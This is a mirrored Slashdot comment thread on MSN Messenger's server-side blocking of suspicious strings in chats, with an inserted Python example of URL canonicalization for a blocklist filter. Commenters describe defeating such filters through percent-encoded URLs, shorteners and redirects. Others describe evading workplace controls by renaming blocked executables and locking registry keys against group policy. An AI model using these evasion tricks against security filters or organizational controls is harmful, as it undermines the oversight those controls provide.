Slashdot Mirror


MSN Censors Your IM

Jamie ran across a story about censorship on MSN. Essentially, a number of suspicious strings result in silent failure of delivery. The strings are unsurprisingly things like .scr and .info. They've started maintaining a list if you're interested. Personally, I'd rather they fix the vulnerabilities that make those strings dangerous in the first place: it's not like IM is the only place a URL can get on your machine.

287 comments

  1. The genius that is Microsoft... by KingSkippus · · Score: 5, Informative

    From an article that is linked to from this one:

    The link filter does not take canonical URLs into account: http://evil.example.com/download.php and http://evil.example.com/down%6Coad.php are the same URL, expressed in two different ways. The first one is blocked, while the second one is not.

    Or for that matter, http://tinyurl.com/z35a5.

    Kind of reminds me of our software filter where I work. They blocked firefox.exe from running. My solution? I renamed the file to iexplore.exe. Worked like a charm.

    It's also probably worth noting that the messages are blocked on the server, not the client. That means that it will block the message whether you're using the MSN client, Pidgin, or any other client to access MSN.

    My advice: Get a frickin' Google mail account already and use Google Talk instead.
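
The canonicalization gap quoted in the comment above, seen from the filter's side. This is an added example, not part of the original comment and not MSN's code: the blocklist is constructed from strings the page mentions, and every function name is hypothetical.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed blocklist built from strings the page says were filtered.
BLOCKED_SUBSTRINGS = ("download.php", ".scr")
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
DEFAULT_PORTS = {"http": 80, "https": 443}


def decode_fully(text, max_rounds=5):
    """Percent-decode until stable, so %256C -> %6C -> l is also undone."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def remove_dot_segments(path):
    """Resolve '.', '..' and empty segments; the result is for matching only."""
    out = []
    for segment in path.split("/"):
        if segment == "..":
            if out:
                out.pop()
        elif segment not in (".", ""):
            out.append(segment)
    return "/" + "/".join(out)


def canonicalize(url):
    """Reduce equivalent spellings of a URL to one comparable form."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()   # also drops any userinfo
    try:
        port = parts.port
    except ValueError:                      # malformed port: ignore it
        port = None
    netloc = host if port in (None, DEFAULT_PORTS.get(scheme)) else f"{host}:{port}"
    path = remove_dot_segments(decode_fully(parts.path))
    query = decode_fully(parts.query)
    canonical = f"{scheme}://{netloc}{path}"
    return canonical + ("?" + query if query else "")


def naive_hits(message):
    """The behaviour described in the comment: match the raw text only."""
    return [s for s in BLOCKED_SUBSTRINGS if s in message]


def canonical_hits(message):
    """Match the raw text and the canonical form of every URL in it."""
    candidates = [message] + [canonicalize(u) for u in URL_RE.findall(message)]
    haystack = "\n".join(candidates).casefold()
    return [s for s in BLOCKED_SUBSTRINGS if s in haystack]


if __name__ == "__main__":
    # Constructed sample messages; the first two URLs are the ones quoted above.
    samples = [
        "http://evil.example.com/download.php",
        "http://evil.example.com/down%6Coad.php",
        "http://evil.example.com/down%256Coad.php",
        "HTTP://EVIL.example.com/a/../DOWNLOAD.PHP",
        "see http://example.com/docs/index.html",
    ]
    for message in samples:
        print(f"{message!r}: naive={naive_hits(message)} "
              f"canonical={canonical_hits(message)}")
```

String-level canonicalization closes only the encoding gap; the shortener and redirect cases raised elsewhere in this thread never expose the final URL to a filter that inspects message text alone.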

    1. Re:The genius that is Microsoft... by lattyware · · Score: 4, Informative

      Or just any Jabber client, for that matter.

      --
      -- Lattyware (www.lattyware.co.uk)
    2. Re:The genius that is Microsoft... by ghmh · · Score: 1

      Kind of reminds me of our software filter where I work. They blocked firefox.exe from running. My solution? I renamed the file to iexplore.exe. Worked like a charm.

      Just make sure you don't get fired for knowingly circumventing security measures....

    3. Re:The genius that is Microsoft... by ChowRiit · · Score: 4, Insightful

      People always miss the point in these arguments, and say "get such and such instead" - it doesn't help, because my friends use MSN, and probably the same for most tech savvy MSN users. Sure, I'd rather use a better protocol, but I'm stuck using what my friends are on. This is the problem with "picking" an IM - the decision isn't made by you, but by the people you want to talk to who already have picked one.

    4. Re:The genius that is Microsoft... by badc0ffee · · Score: 1, Insightful

      You are known by the company you keep. Either get other friends, or convert the ones you have. Don't put up with dumbing down to the lowest common denominator. To paraphrase someone else's sig: Twice half fast make the dumb mass whole.

      --
      1011 1010 1101 1100 0000 1111 1111 1110 1110
    5. Re:The genius that is Microsoft... by kc2keo · · Score: 0

      My school blocks programs from running on the computers also. I was running putty.exe or winscp.exe which was blocked. I renamed them to explorer.exe and notepad.exe and it ran fine.

    6. Re:The genius that is Microsoft... by rikkus-x · · Score: 2, Funny

      "Either get other friends, or convert the ones you have"

      Says the person with a binary signature.

    7. Re:The genius that is Microsoft... by Buran · · Score: 1

      For using something that ISN'T full of security holes? Hah.

    8. Re:The genius that is Microsoft... by Zombywuf · · Score: 1
      --
      If you can read this you've gone too far.
    9. Re:The genius that is Microsoft... by Wordsmith · · Score: 4, Funny

      The day I start picking my friends based on their responses to IM security issues will be a sad, sad day.

      "Mom, I met a great girl. She's not very nice, and she's not very pretty, but she started using Jabber after the latest MSN fiasco. You'll love her. I'll have her message you; oh, but you'll have to switch off of AIM first, mom."

    10. Re:The genius that is Microsoft... by Geekbot · · Score: 1

      Just watch out that they aren't using other software to monitor processes. You can change the filename to bypass the restrictions but there could be process monitoring software that would inform them that you are bypassing security measures. I doubt anyone cares *that* much, but CYA.

    11. Re:The genius that is Microsoft... by bredk · · Score: 0

      OTR-encryption. Thanks. Bye.

      --
      http://slashdot.su/
    12. Re:The genius that is Microsoft... by Blakey+Rat · · Score: 1

      My advice: Get a frickin' Google mail account already and use Google Talk [google.com] instead.

      Sage advice, for a person with no friends. (Then again, if you have no friends, why would you use IM in the first place?)

      "Switching" to GoogleTalk is easy; convincing the 40+ people on my list to all "switch" to GoogleTalk is less easy. Saying that they need to "switch" to GoogleTalk to talk to me will most likely result in them not talking to me. (So I guess I'm not as popular as I thought!)

      Of course I put "switch" in quotes, because this is like the Mac Vs PC argument: there's absolutely nothing that stops you from using both, so the term "switch" is kind of stupid in this context.

    13. Re:The genius that is Microsoft... by Yodalf · · Score: 1

      "... tech savvy MSN users. ..."

      Hum. Yes. Of course.

      That explains everything.

    14. Re:The genius that is Microsoft... by SanityInAnarchy · · Score: 1

      This is why I have accounts all over the place on my Kopete -- there are people that I actually want/need to talk to occasionally who are on various other networks, everything from MSN to Yahoo. It's actually no more work for me to set those up and maintain them than it is to run Jabber.

      But I also used to have a Jabber server. (Or I used to, and I will again when I get around to setting it up again.) I tell most people to just download Google Talk, though. That's the thing -- Jabber is trying to take IM where Email already is. Anyone can setup a mailserver and start selling or giving away email addresses, so there's actually competition for services.

      Using MSN IM instead of Jabber is a bit like using Myspace instead of email.

      --
      Don't thank God, thank a doctor!
    15. Re:The genius that is Microsoft... by tachyonflow · · Score: 1

      it doesn't help, because my friends use MSN, and probably the same for most tech savvy MSN users.

      I'm a little surprised to hear that MSN is still so popular. Almost all of my friends are on Google Talk now. I didn't really expect that to happen, since MSN and the others were so established. However, it seems that including a talk client on the Gmail page was exactly what Google needed to get their foot in the door.
    16. Re:The genius that is Microsoft... by Anonymous Coward · · Score: 0

      Sounds like the same kind of protection that AppArmor does, easily bypassed.

    17. Re:The genius that is Microsoft... by Actually,+I+do+RTFA · · Score: 1

      My advice: Get a frickin' Google mail account already and use Google Talk instead.

      Because occasional random censorship (MSN), or using evil companies (AIM, MSN), is worse than having all your conversations logged or otherwise datamined to sell ads? And that doesn't even get into the ease of using products to encrypt your IMs to evade this.

      Hating Google in 10 years will be as cool as hating Microsoft now. I'm getting a headstart.

      --
      Your ad here. Ask me how!
    18. Re:The genius that is Microsoft... by Alchemar · · Score: 2, Insightful

      I had the same problem.... I picked better friends.

      Anyone that I have any relation with knows that I will not contact them via MSN, AIM, My Space, Live Journal or any of their like. If they wish to communicate they can call me on the phone or send an email. If they push the point, I suggest that they learn to use IRC or obtain a HAM radio license with a morse code rating, and I will gladly send them an instant message. Most have selected the telephone as their main choice, but one now holds a General class license. I view them pushing their "favorite" method onto me insulting and expect them to feel the same. If they do not find a medium that is commonly available and required for business communications as acceptable, then I really don't want to be associated with them.

    19. Re:The genius that is Microsoft... by Anonymous Coward · · Score: 0

      Kind of reminds me of our software filter where I work. They blocked firefox.exe from running. My solution? I renamed the file to iexplore.exe. Worked like a charm.

      You "do" realize you're breaking your company/corporate policy by doing that, don't you?

      Instead of taking the renegade route why don't you talk to management or IT or whomever can accept Firefox as an alternative browser.

      Remember, your company/corporate computers are their property, not yours. They can decide what to run on it and how.

      If you don't like it then change their mind or find another job, don't break the law.

      Just my 2 cents.
    20. Re:The genius that is Microsoft... by Lumpio- · · Score: 1

      Somebody needs to create a really evil exploit that uses a .com URL. We need to see if we can get Microsoft to block their own site.

  2. -gasp- Slashdot, too! by Aladrin · · Score: 4, Interesting

    "Nothing for you to see here. Please move along."

    I'm guessing they're using that as a way to make sure only subscribers can get first post now? It wouldn't load for me until someone had posted.

    As for the IM... I don't care what it is, it's not their job to censor it. Virus check attachments, sure... But not censor the chat. Absolutely ridiculous. Reminds me of games that try to filter out all 'bad' words and end up filtering out words like 'fanny' because they mean 'butt' in the US and apparently refer to women's genitalia in the UK. How people NAMED Fanny deal with that, I can't imagine. There were quite a few more commonplace words that mean odd things in other languages or countries and were filtered as well. Ridiculous.

    --
    "If you make people think they're thinking, they'll love you; But if you really make them think, they'll hate you." - DM
    1. Re:-gasp- Slashdot, too! by Anonymous Coward · · Score: 0

      People named Fanny are probably Swedish so it doesn't matter, it's just appropriate -- they're such asses/cunts for real...

    2. Re:-gasp- Slashdot, too! by KingSkippus · · Score: 4, Funny

      Reminds me of games that try to filter out all 'bad' words

      I play City of Heroes, and for some weird reason, it blocks the word "count." I think it was a typo when someone was entering words to block into the filter. It was just kind of funny, because I discovered it when I told someone, "Don't worry, you can count on me!" and it came out as "Don't worry, you can <bleep!> on me!" They had no idea what I was talking about, and it took a few entertaining minutes to hash out what was going on.

    3. Re:-gasp- Slashdot, too! by UbuntuDupe · · Score: 1

      I remember on the Microsoft-run zone.com (a game site), the filter is also extremely harsh. They extended it to innocent topics that happen to get used for trolling a lot. (Don't ask how I know...) For example, you can't say "holocaust", apparently because people like to deny it, and you can't say any form of "racist".

    4. Re:-gasp- Slashdot, too! by gbjbaanb · · Score: 4, Funny

      Ah, the northern UK town of Scunthorpe has been affected by this problem for some time now. I think a "Scun" must be a rude word in American English or something.

    5. Re:-gasp- Slashdot, too! by jZnat · · Score: 1

      And you usually can't say "sniggers". What are you supposed to use? "Snickers"? That's a candy, not a verb that means "laughing".

      --
      'Yes, firefox is indeed greater than women. Can women block pops up for you? No. Can Firefox show you naked women? Yes.'
    6. Re:-gasp- Slashdot, too! by markxz · · Score: 1

      In the Famous Five series of childrens' books one of the characters is called Aunt Fanny.

      She also wrote a short story about a chocolate cock.

    7. Re:-gasp- Slashdot, too! by Anonymous Coward · · Score: 0

      I think it was a typo when someone was entering words to block into the filter.
      Not necessarily a typo, some filters also block words that are similar to ones that are listed to be censored.
    8. Re:-gasp- Slashdot, too! by Darren+Winsper · · Score: 0, Redundant

      Actually, it tends to be because Scunthorpe happens to contain the word "cunt".

    9. Re:-gasp- Slashdot, too! by KingSkippus · · Score: 0, Redundant

      For what it's worth, I got the joke. :-)

    10. Re:-gasp- Slashdot, too! by Anonymous Coward · · Score: 0

      And what about "niggardly"? It's a perfectly innocent word with no relation to racial epithets, but that doesn't stop some people.

    11. Re:-gasp- Slashdot, too! by karnal · · Score: 1

      *whoosh*

      --
      Karnal
    12. Re:-gasp- Slashdot, too! by Anonymous Coward · · Score: 0

      snicker is, actually, a word for laugh. in fact, it means "to snicker."

      when it comes to language, it pays to not be niggardly.

    13. Re:-gasp- Slashdot, too! by Buran · · Score: 1

      You can turn off the profanity filter. Go to Menu > Options and I think it is in the leftmost tab of the options window. Then you should no longer see this. But it's a per-user setting and is done on the receiving end so if your recipient has the filter on still they will see the censored word.

      Why it thinks "count" is a swear word, I've got no idea, but turning off the nanny filter remains one of the first things I do when setting up a new character (I seem to remember that the filter is, like the UI colors, one of the things that isn't a global preference. Arrrgh).

    14. Re:-gasp- Slashdot, too! by KingSkippus · · Score: 1

      The problem, though is that after the brouhaha, people started deliberately using the "innocent" word in mean-spirited ways. I mean, come on, before all of this mess, no one ever used the word niggardly in normal conversation. One guy does it, misguided racial accusations fly, stalwart defense is mounted, and now, people use it all the time. It's not that the word deserves to be more common; they're doing it specifically for the purpose of its new racial connotations even though there really shouldn't be any.

      Read this section about the controversy in Wikipedia for more insight, and a good idea of why using the word "niggardly," even if it's technically correct in the sentence you've made, can still be taken in a racial sense. And, of course, ask yourself if you're using it because it happens to be the best word for the sentence, or because it sounds so much like the other n-word.

    15. Re:-gasp- Slashdot, too! by Darren+Winsper · · Score: 1

      D'oh!

    16. Re:-gasp- Slashdot, too! by toddestan · · Score: 1

      Similar things happen to people who live in Coon Rapids, which is the name of a real town in Minnesota.

    17. Re:-gasp- Slashdot, too! by matazar · · Score: 1

      This reminds me of the word filter in Ragnarok. They did a poor job of it because any word that had a swear word in it was filtered.
      You couldn't say japanese because it had jap in it.
      You couldn't say cucumber because it had cum in it.


      The list goes on and on.

    18. Re:-gasp- Slashdot, too! by janrinok · · Score: 2, Funny

      WHOOSH......

      --
      Have a look at soylentnews.org for a different view
    19. Re:-gasp- Slashdot, too! by einnar2000 · · Score: 1

      They filtered out "wristwatch" in Earth and Beyond because of the word in the middle of it, too. (Starts and ends with the Ts.)

    20. Re:-gasp- Slashdot, too! by Reaperducer · · Score: 3, Insightful

      The problem, though is that after the brouhaha, people started deliberately using the "innocent" word in mean-spirited ways. I mean, come on, before all of this mess, no one ever used the word niggardly in normal conversation.
      Not necessarily. It depends on who's in your circle of friends. YOUR circle of friends may not use that word, but that doesn't mean that "no one" ever used it, especially in formal writing or speeches.

      During the controversy, one of the newspapers (Boston, I think) ran through one of the loudest critic's prior speeches and found that he'd used it in the past, as well.

      Just because SOME people are that special combination of both ignorant and loud, it shouldn't change the way educated people communicate.
      --
      -- I'm old enough to have lived through six different meanings of the word "hacker."
    21. Re:-gasp- Slashdot, too! by mpe · · Score: 1

      Reminds me of games that try to filter out all 'bad' words and end up filtering out words like 'fanny' because they mean 'butt' in the US and apparently refer to women's genitalia in the UK. How people NAMED Fanny deal with that, I can't imagine.

      Even more difficult if they are called "Fanny Babcock". IIRC Someone actually compiled a webpage entitled "Smut which only a machine could identify".

    22. Re:-gasp- Slashdot, too! by mpe · · Score: 1

      They filtered out "wristwatch" in Earth and Beyond because of the word in the middle of it, too. (Starts and ends with the Ts.)

      A classic problem with poorly defined regular expressions as "profanity filters". It might help to "throw a dictionary at it" as part of testing. i.e. Before letting people see how daft it actually is...

    23. Re:-gasp- Slashdot, too! by SanityInAnarchy · · Score: 1

      I play an MMO which has a reasonable language filter, or as reasonable as it can be. Rather than bleeping stuff, it simply substitutes the "bad" word for an "equivalent". It also makes for some rather hilarious conversations, once they decided that in most cases, you were allowed to swear so long as you didn't attempt to bypass the language filter.

      It doesn't catch everything, as it doesn't look at the boundaries of words, so that you can't get around "fuck" by saying "fucker" or "fucking".

      Here's a short list of what I can remember:

      fuck -> darn
      shit -> dang
      slut -> girl
      whore -> maid
      bitch -> dog
      asshole -> ant
      bastard -> idiot
      wtf -> wt
      password -> soul
      pussy -> cat
      (any body part not outright censored) -> toe
      (some body parts are completely censored -- cock, for instance)

      And so on. It also has funny things like: If you attempt to say your password in any way inside the game, it will actually boot you to your desktop with an error message of something like "Please try to keep your password safe!"

      What's funny is, I think it's actually legal to say things like "darn you", but not things like "so I was darning this girl..."

      It's also entirely illegal to attempt to circumvent the language filter -- you can say "darn you, you piece of dang", but not "f uck you"...

      In general, it rarely causes problems, although it becomes a problem if you want to talk about out-of-character things like Alfred Hitchcock. (Yes, actually did run into that one.) I also fail to see why private messages should be censored that way... But anyway, it's tolerated mostly because it's actually hilarious, and only very occasionally is unavoidable. For example, the Archons occasionally post computer security tips to the boards, but "password" is censored, so they have to say something like "passwrod".

      Anyway, as far as I'm concerned, I'm not opposed to a voluntary censorship on the receiving end, even one that an admin (or parent) can turn on and leave on. I'm also not opposed to banning people for swearing and making assholes of themselves in large public areas of an MMO (usually they're jailed instead of banned, but whatever). But I do agree that on a private IM, or any other private message, it's not up to the network to unilaterally censor anything, especially such broad crap like .info.

      --
      Don't thank God, thank a doctor!
    24. Re:-gasp- Slashdot, too! by Anonymous Coward · · Score: 0

      So you troll there too?

    25. Re:-gasp- Slashdot, too! by KingSkippus · · Score: 1

      Sorry for the confusion, but my profanity filter was off. (One of my first steps, too.) Theirs was on. Thus, the ensuing hilarity. The person I was talking to thought I was saying something obscene; all I saw was that I told them they could count on me, and they were acting like I had just cussed them out.

    26. Re:-gasp- Slashdot, too! by glitch23 · · Score: 5, Funny

      Ah, the northern UK town of Scunthorpe has been affected by this problem for some time now. I think a "Scun" must be a rude word in American English or something.

      No, it's "Thor". We don't like Scandinavians.

      --
      this nation, under God, shall have a new birth of freedom. -- Lincoln, Gettysburg Address
    27. Re:-gasp- Slashdot, too! by Buran · · Score: 1

      Which is pretty funny when you think about it ... Do they have anything against a certain vampire in Transylvania, for instance!?

      If you haven't already done it, I'd file a bug report. Type /bug (blahblah) to open a bug report window with the command argument pre-entered as the subject line for the bug.

    28. Re:-gasp- Slashdot, too! by Kris_J · · Score: 1

      Save a thought for poor old Dick Smith Electronics. They sell World of Warcraft but you can't say their name on the official WoW forums.

    29. Re:-gasp- Slashdot, too! by Anonymous Coward · · Score: 0

      However bad Ragnarok was, Runescape is ten times worse.

      The filter automatically detected LIKELY word combinations, rather than just being a dictionary of blockable swear words, so it would sometimes block things that weren't even words.

      if you tried to type ";/." for whatever reason (YOU MIGHT WANT TO!!!)
      it would come up as "***".

      It was just nonsensical.

    30. Re:-gasp- Slashdot, too! by mdmkolbe · · Score: 1

      Reminds me of when America's Army tried an unusual way of filtering for a while. Instead of blocking the word, they substituted it with a less offensive synonym. For example if I said "Joe is camping", you would see "Joe is using tactics". Three things came out of that:

      1. It took me a while to figure why everyone was complaining about tactics.
      2. People quickly learned to misspell certain key words (e.g. "camping" became "kamping").
      3. I think AA gave up on the idea b/c anything like this is too easy to defeat. (See #2)
    31. Re:-gasp- Slashdot, too! by Sigma+7 · · Score: 1

      Reminds me of when America's Army tried an unusual way of filtering for a while. Instead of blocking the word, they substituted it with a less offensive synonym. For example if I said "Joe is camping", you would see "Joe is using tactics". Three things came out of that:

      While that might have been abandoned, there's a way to fix it in future implementations.

      As soon as the word camping comes up, print an in-game ad for "camp-buster", that kills off players standing still for more than ~300 milliseconds. It's more than enough time to keep players in action, and will cut down on any issues with players holding down a single area by "camping".
    32. Re:-gasp- Slashdot, too! by ChameleonDave · · Score: 1

      Speaking of the name "Fanny" being used to mean "pussy"... that reminds me of when my girlfriend and I had to organise a visit to a gynaecologist for her. We were looking through the Yellow Pages when we saw a certain Dr Fanny Mouilleron. Well, we couldn't miss the opportunity to go and see the "fanny doctor". It had us cracking up. We didn't have the guts to explain the joke to her, though. ;-)

      Come to think of it, her surname sounds a lot like ''mouillé'', meaning "wet". That's even funnier!

    33. Re:-gasp- Slashdot, too! by Anonymous Coward · · Score: 0

      The residents of Clitheroe were similarly offended.

    34. Re:-gasp- Slashdot, too! by Corporate+Troll · · Score: 1

      Come to think of it, her surname sounds a lot like ''mouillé'', meaning "wet". That's even funnier!

      Only "even funnier". Ehm... Yes, but only because your grasp of French seems not to extend to certain areas. "La mouille" (no accent in this case) is a word for vaginal secretions, those of the kind that women have when they get excited if you catch my drift. So, yes, that name is funny. But, you're right, it evidently comes from "mouillé" which means "wet".

      That said, "Mouilleron" is a village in France. Probably the true origin of her surname.

    35. Re:-gasp- Slashdot, too! by ChameleonDave · · Score: 1

      Yes, but only because your grasp of French seems not to extend to certain areas. "La mouille" (no accent in this case) is a word for vaginal secretions

      Yeah, and there's the verb mouiller too. What's your point? Did you think I was talking about rain, or freshly washed lettuce? I was talking about vaginal secretions. I think you just wanted to say your French was better than someone else's.

      That said, "Mouilleron" is a village in France. Probably the true origin of her surname.

      No doubt, although it doesn't really add anything to the anecdote. Hey, I can use Google too: there's a village called "La Mouille". The guys there must be hunky.

    36. Re:-gasp- Slashdot, too! by Corporate+Troll · · Score: 1

      No, you said just "wet", implying indeed vaginal secretions but not stating that there is even a word that is exactly what you meant in French. So, you're pissed because I attacked your French? My excuses for that, I just thought that you didn't know what "la mouille" means. I still think you didn't know....

      Oh, and there is also a difference between having to Google and actually knowing without Googling... You did know that, didn't you?

    37. Re:-gasp- Slashdot, too! by Corporate+Troll · · Score: 1

      Oh, I see where the wind is coming from. I insulted a translator in his trade. So, I take that back.... You did know what "mouille" meant, but you chose not to tell the slashdot readers. For whatever reason....

      The French on your site still is very pompous, but hey, that's just me.

    38. Re:-gasp- Slashdot, too! by Cro+Magnon · · Score: 1

      ROTFLMAO! I was once on a website that filtered wristwatch, tycoon (last 4 letters are racial slur), and our VP's first name. So I made a point of bringing up those topics of conversation, just to show how stupid the filter was.

      --
      Slow down, cowboy! It has been 4 hours since you last posted. You must wait another few hours.
    39. Re:-gasp- Slashdot, too! by mdmkolbe · · Score: 1

      Heh, cute, but I fear that would just teach everyone to constantly do an irish jig. Humans are very good at adapting in ways you don't expect.

      Since AA is an army based offense/defense game it would also kind of defeat the style of the game. An effective defensive team may spend 5-10 min waiting for the offense to advance to the point that they have chosen to defend. The offense takes that long to get there because they have to carefully clear each room so they don't get shot in the back while taking the objective. When your job is to defend a certain objective and one bullet kills with no respawn, "camping" is a very legitimate tactic.

      That said, I still think banning the word "camping" was silly.

    40. Re:-gasp- Slashdot, too! by dickrichardv8 · · Score: 1

      An irc bot chastised me for using the name "Alan Cox" in conversation. I wonder how Mr Cox feels about being a no-no name on #ubuntu on Freenode.

    41. Re:-gasp- Slashdot, too! by Anonymous Coward · · Score: 0

      they're doing it specifically for the purpose of its new racial connotations even though there really shouldn't be any.
      A mindreader, are you?
  3. Huh? by jafiwam · · Score: 0, Troll

    "Fix the vulnerabilities first"?

    WTF you talkin bout. Out of that list used as an example, 5 were PHP security problems (who has PHP installed on the local PC?) one was an odd but normal TLD. One was an executable file.

    I'd like to know, how "just fix the software" works in a world where 60% of users don't know about updates, don't update when they do know, or use pirated software the vendor actively blocks from updates.

    There are certain strings that have no legit business in MSN chat, that's true. In my opinion, that list doesn't have any of them, AND poses a threat to other stuff aside from the local computer.

    God Damn I hate bloggers.

    1. Re:Huh? by lattyware · · Score: 1

      No. The first 5 were urls where there was the beginning of passing a variable in the GET style. As used by PHP. None of them are a vulnerability, they are just pages that sound likely to have a vulnerability.

      --
      -- Lattyware (www.lattyware.co.uk)
    2. Re:Huh? by Anonymous Coward · · Score: 0

      There are certain strings that have no legit business in MSN chat, that's true.
      Who the fuck do you think you are, and what gives you the right to tell people what they can and can't talk about on MSN?
    3. Re:Huh? by Anonymous Coward · · Score: 0

      I'd like to know, how "just fix the software" works in a world where 60% of users don't know about updates, don't update when they do know, or use pirated software the vendor actively blocks from updates.


      Easy there.... Don't bust a vein.

      Programming to the least common denominator because you assume the majority of users are idiots is exactly the reason we end up with shitty software like most of what Microsoft produces. It ends up being difficult to do anything but what they decided it's "safe" for you to do. Things they made a wizard or button for, and that's it. People who know what they're doing lose functionality. And the benefit? It keeps the idiots out of trouble for about 3 days until the people who exploit idiocy find a new way.

      How do you fix this when users don't update? Easy. Fix the problem, release a patch, and then don't allow users to connect unless their systems are patched. Or make it an option that's on by default, but can be turned off.
  4. Anybody else notice its .php files that get ... by crovira · · Score: 1

    squashed?

    And what does every Linux web server come with?

    RIGHT...

    --
    MSBPodcast.com The opinions expressed here are my own. If you don't like 'em... Think up your own stuff.
    1. Re:Anybody else notice its .php files that get ... by jZnat · · Score: 1

      Every Linux web server comes with Perl also...

      Anyhow, I think it's because script kiddies tend to use (or exploit) PHP applications more often than other scripting languages due to its high availability in cheap hosting environments.

      --
      'Yes, firefox is indeed greater than women. Can women block pops up for you? No. Can Firefox show you naked women? Yes.'
    2. Re:Anybody else notice its .php files that get ... by DrSkwid · · Score: 1

      Also the php files are in the document_root directory (or whatever you want to call it). Write access to document_root should be off but it usually isn't.

      Perl and other CGI stuff is usually script aliased out of document_root and run from there

      /www/public_html # document root
      /www/public_html/index.php # shitty PHP script
      /www/cgi-bin
      /www/cgi-bin/dirty_perl.pl # Long tooth Larry's stuff

      And pl files also need chmod +x ing whereas php files will just run.

      Those crazy "easy to set up" routes get you owned, but they always want to learn the hard way.

      --
      There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
    3. Re:Anybody else notice its .php files that get ... by Lillesvin · · Score: 3, Insightful

      Also the php files are in the document_root directory (or whatever you want to call it).

      Yeah, on the server - then they could exploit the server hosting them... Why on earth would MS care about that? They're doing the filtering to protect the end-users from exploits of vulnerabilities in the MSN client. It doesn't matter the least bit if it's PHP, Perl, Ruby, ASP or whatever that runs on the server-side - it's what is returned from the server-side that matters. I'll have to agree with the guy guessing that PHP is usually the first choice of scripting language for script kiddies.

      And as the first poster noted, TinyURLs get through just fine, plus it'd be the least of problems to make an HTTP redirect, so http://example.com/harmless.script points to http://example.com/malicious.script?that=pwns&MSN=users. This way of "fixing" bugs is nothing but retarded - it fixes nothing and it hassles end-users a great deal - some of those substrings that are getting blocked are VERY common.

      --
      "Live free or don't."
  5. Blocked firefox.exe by nurb432 · · Score: 2, Funny

    And simply renaming worked? Your IT department is pretty inept.

    --
    ---- Booth was a patriot ----
    1. Re:Blocked firefox.exe by lattyware · · Score: 5, Funny

      An inept IT department?
      OMFG!
      Someone alert the world press!

      --
      -- Lattyware (www.lattyware.co.uk)
    2. Re:Blocked firefox.exe by nurb432 · · Score: 1

      There are reasons to block it, and anything else the user wants to install on their own.

      --
      ---- Booth was a patriot ----
    3. Re:Blocked firefox.exe by tepples · · Score: 1

      There are reasons to block it, and anything else the user wants to install on their own.

      But still, only an inept IT department would refuse to consider a reasonable proposal to whitelist a version of Mozilla Firefox software in appropriate circumstances.
    4. Re:Blocked firefox.exe by KingSkippus · · Score: 4, Interesting

      No, they specifically blocked firefox.exe. It wasn't part of a regular expression or policy to keep people from running their own programs. They made a deliberate and conscious choice to not only standardize on Internet Explorer as the Official Company Browser(TM), but to try to prevent anything else from even working.

      It's not the only time they've done something lame-ass like that. For example, they've also created an Active Directory policy to push down the corporate intranet page as your home page. So if you're like me and prefer something like Google as your home page, too damn bad, it resets it next time you log in. I had to go in and deny permission to that registry key for Administrators to keep that from happening. (Yes, I know, they can reset the permissions on the key if they figure out what I've done, but they're not that motivated, and the point was to keep the automatic update from happening, which this does successfully.)

    5. Re:Blocked firefox.exe by QuoteMstr · · Score: 1

      Sure: to provide justification for your own job.

    6. Re:Blocked firefox.exe by nurb432 · · Score: 2, Insightful

      Pushing down the default page via GPO sounds pretty responsible to me. It helps prevent users' default pages getting hijacked with porn sites, among other things.

      Part of IT's job is to protect the corporate computing assets and keep them running properly for the needs of the job. If that happens to step on your personal wants, then that's too bad. The PC is there for work, not as a toy for you. You have your personal toys at home.

      --
      ---- Booth was a patriot ----
    7. Re:Blocked firefox.exe by nurb432 · · Score: 2, Insightful

      User-installed software that isn't part of the official internal standard increases support costs, among other issues. So unless there is a business need, I don't see a problem with it being blocked. (Though simply blocking an executable name isn't the right way to do it, but that is a different discussion.)

      Now, if you come up with a valid business need for said non-standard software, and it's ignored, then we are in agreement.

      --
      ---- Booth was a patriot ----
    8. Re:Blocked firefox.exe by KingSkippus · · Score: 4, Insightful

      If that happens to step on your personal wants, then that's too bad.

      What if it steps on what I need to do my job? I'm glad I don't work for you. You seem to be one of those types that thinks that just because something can be done, it needs to be done. Pushing down the default page doesn't protect the corporate computing assets, though I'm sure that's how our desktop goobers pitched it to management. It's just one more way to control things they have no business controlling, and it impacts our productivity.

      They also do things like push down custom Start Menu structures. Microsoft Word, for example, isn't under All Programs or even Microsoft Office like it is on every other computer. No, it's buried under "Office Applications" (not to be confused with "Business Applications," a separate directory), along with things like Adobe Acrobat and such. They've also moved Windows Explorer (the filesystem explorer, not Internet Explorer) under Accessories. If I change this to something I'm more used to, it gets reverted next time I log in. Obviously, they've also deleted and blocked Solitaire and Minesweeper from running; it wouldn't do for people to take a break from hammering their stones. The company logo is pushed out to be everyone's desktop background.

      My favorite, though, is that they've decided that everyone needs a little application called Kontiki. It's a peer-to-peer video distribution software system that turns all of our PCs into filesharing peers for corporate videos. You can't disable it and you can't delete the videos that it pushes down. (If you try deleting a video, the software automatically re-downloads it from--you guessed it--your coworkers' computers.) I detest days when corporate videos go out. My bandwidth is sucked dry by something I neither want nor use and have no control over.

      Let's see... Need more stories? How about this. They recently pushed out a piece of software called Connected Backup. What happened is that our fileservers where people's home directories were started filling up. Instead of going out and buying more hard drives or implementing quotas, they've rolled out this backup software to everyone's computer that automatically backs up your machine once a day whether you want it to or not. Now, they're telling everyone that official company policy is to NOT store important documents on the fileservers, but to store them on your local PCs. Brilliant! Of course, network traffic has shot up dramatically, and the backup servers had to have a TON of storage added to them (the data still has to go somewhere), and instead of only things that people save on the fileservers being backed up, all of their personal shit is, too.

      Every day, my computer runs a Connected backup, a virus scan, a vulnerability scan, a document retention scan, a software installation scan, Notes database replication, and my Run key in the registry has around 50 entries in it that our desktop group has loaded in, and it takes around two minutes for all of the group policies and login scripts to run when I log in. Thanks to our desktop group, literally 30 minutes of my day is wasted waiting for all of that shit to run.

      I could go on with the stupidity if you really want me to. You're right about one thing; they've definitely protected the corporate computing assets. People hate using their computers so much now that a lot of people I know have gone back to just leaving it on all the time for doing their timesheets, and conduct their normal business using old school methods such as the telephone and pencil and paper. As for me, I actually do some of my work at home using my own computing resources, and the only reason I can tolerate using my work computer for anything is because I know how to get around most of the shit they try to push down on us.

    9. Re:Blocked firefox.exe by nuggetman · · Score: 1

